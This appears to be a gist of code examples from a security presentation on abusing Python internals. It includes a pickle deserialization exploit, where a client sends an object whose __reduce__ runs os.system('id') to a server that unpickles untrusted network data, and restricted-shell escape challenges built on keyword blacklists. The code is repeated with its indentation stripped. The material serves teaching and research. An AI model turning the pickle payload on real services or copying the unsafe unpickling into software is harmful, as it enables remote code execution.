MarkBaggett/1 - pythons_sinister_secrets.md

## 1 - pythons_sinister_secrets.md

      
    Raw
  

              1 - pythons_sinister_secrets.md
            
          
    Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf

  
## get_modules.py
def getmodules(mods = "root",depth=0,path=[],verbose=False):
    modlist = []
    if mods == "root":
        mods = dict([(x,y) for (x,y) in globals().items() if str(y)[:7]=="<module"])
    if verbose: print(depth, "PROCESSING ALL MODULES", mods)
    for eachname,eachmod in mods.items():
         if verbose: print("+"*depth, "PATH {0} CURRENT ITEM {1}".format(path,eachname))
         if eachname in path:
            if verbose: print("Already have {0} in path {1}".format(eachname,path))
            continue
         if verbose: print("OUTPUT :", ".".join(path+[eachname]))
         modlist.append( ".".join(path+[eachname]) )
         submods = dict([(x,y) for (x,y) in eachmod.__dict__.items() if str(y).startswith("<module")])
         if submods:
             if verbose: print("CALLING AGAIN FOR SUBMODS OF",eachname, submods)
             modlist.extend(getmodules(submods,depth+1,path+[eachname], verbose=verbose))
         else:
             if verbose: print("MODULE {} has no submodules.".format(eachname))
    return modlist


## make_object.py
import sys
def makeobject(afunction):
   print("Generating a function for version {}.{} (same version as this machine)".format(sys.version_info.major, sys.version_info.minor))
   newstr = ""
   newstr += "def a():\n"
   newstr += "   return\n\n"
   if sys.version_info.major == 2:
       co = afunction.__code__
       if sys.version_info.minor not in [5,6,7]:
           print("This code has not been tested on this version of python.  It may not work.")
       newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},'{4}',{5},{6},{7},'{8}','{9}',{10},'{11}')".format( co.co_argcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code.encode("string_escape"),co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab.encode("string_escape"))
   elif sys.version_info.major == 3:
       co = afunction.__code__
       if sys.version_info.minor not in [5]:
           print("This code has not been tested on this version of python.  It may not work.")
       newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},{4},{5},{6},{7},{8},'{9}','{10}',{11},{12})".format( co.co_argcount, co.co_kwonlyargcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code,co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab)
   else:
       print("This version of python is not tested and may not work")
   print(newstr)

## pickle_demo_client.py
import pickle,socket

class evil(object):
    def __reduce__(self):
        import os
        return (os.system, ('id',))

x = evil()
s = socket.socket()
s.connect(("127.0.0.1",9000))
s.send(pickle.dumps(x))

## pickle_demo_server.py
import pickle,socket

s = socket.socket()
s.bind(("",9000))
s.listen(1)
client,metadata = s.accept()
pickle.loads(client.recv(4096))

## restricted_shells.py
import readline,code

def readfilter(*args,**kwargs):
    inline = input(*args,**kwargs)
    if any(map(lambda x:x in inline,blacklist)):
        print("Command is forbidden!")
        return ""
    return inline

print("Challenge:Execute the 'id' command.  Type CTRL-D to move on to the next challenge")
blacklist = ['import','eval','compile']
code.interact(banner='Restricted shell #1', readfunc=readfilter)

print("Challenge:Execute the 'id' command.  Type CTRL-D to move on to the next challenge")
blacklist = ['import','exec','compile']
code.interact(banner='Restricted shell #2', readfunc=readfilter)

print("Challenge:Execute the 'id' command.  Type CTRL-D to move on to the next challenge")
blacklist = ['import','exec','eval']
code.interact(banner='Restricted shell #3', readfunc=readfilter)

print("Challenge:Execute the 'id' command.  Type CTRL-D to move on to the next challenge")
blacklist = ['import','exec','eval','compile']
code.interact(banner='Restricted shell #4', readfunc=readfilter)
	def getmodules(mods = "root",depth=0,path=[],verbose=False):
	modlist = []
	if mods == "root":
	mods = dict([(x,y) for (x,y) in globals().items() if str(y)[:7]=="<module"])
	if verbose: print(depth, "PROCESSING ALL MODULES", mods)
	for eachname,eachmod in mods.items():
	if verbose: print("+"*depth, "PATH {0} CURRENT ITEM {1}".format(path,eachname))
	if eachname in path:
	if verbose: print("Already have {0} in path {1}".format(eachname,path))
	continue
	if verbose: print("OUTPUT :", ".".join(path+[eachname]))
	modlist.append( ".".join(path+[eachname]) )
	submods = dict([(x,y) for (x,y) in eachmod.__dict__.items() if str(y).startswith("<module")])
	if submods:
	if verbose: print("CALLING AGAIN FOR SUBMODS OF",eachname, submods)
	modlist.extend(getmodules(submods,depth+1,path+[eachname], verbose=verbose))
	else:
	if verbose: print("MODULE {} has no submodules.".format(eachname))
	return modlist
	import sys
	def makeobject(afunction):
	print("Generating a function for version {}.{} (same version as this machine)".format(sys.version_info.major, sys.version_info.minor))
	newstr = ""
	newstr += "def a():\n"
	newstr += " return\n\n"
	if sys.version_info.major == 2:
	co = afunction.__code__
	if sys.version_info.minor not in [5,6,7]:
	print("This code has not been tested on this version of python. It may not work.")
	newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},'{4}',{5},{6},{7},'{8}','{9}',{10},'{11}')".format( co.co_argcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code.encode("string_escape"),co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab.encode("string_escape"))
	elif sys.version_info.major == 3:
	co = afunction.__code__
	if sys.version_info.minor not in [5]:
	print("This code has not been tested on this version of python. It may not work.")
	newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},{4},{5},{6},{7},{8},'{9}','{10}',{11},{12})".format( co.co_argcount, co.co_kwonlyargcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code,co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab)
	else:
	print("This version of python is not tested and may not work")
	print(newstr)
	import pickle,socket

	class evil(object):
	def __reduce__(self):
	import os
	return (os.system, ('id',))

	x = evil()
	s = socket.socket()
	s.connect(("127.0.0.1",9000))
	s.send(pickle.dumps(x))
	import pickle,socket

	s = socket.socket()
	s.bind(("",9000))
	s.listen(1)
	client,metadata = s.accept()
	pickle.loads(client.recv(4096))
	import readline,code

	def readfilter(args,*kwargs):
	inline = input(args,*kwargs)
	if any(map(lambda x:x in inline,blacklist)):
	print("Command is forbidden!")
	return ""
	return inline

	print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge")
	blacklist = ['import','eval','compile']
	code.interact(banner='Restricted shell #1', readfunc=readfilter)

	print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge")
	blacklist = ['import','exec','compile']
	code.interact(banner='Restricted shell #2', readfunc=readfilter)

	print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge")
	blacklist = ['import','exec','eval']
	code.interact(banner='Restricted shell #3', readfunc=readfilter)

	print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge")
	blacklist = ['import','exec','eval','compile']
	code.interact(banner='Restricted shell #4', readfunc=readfilter)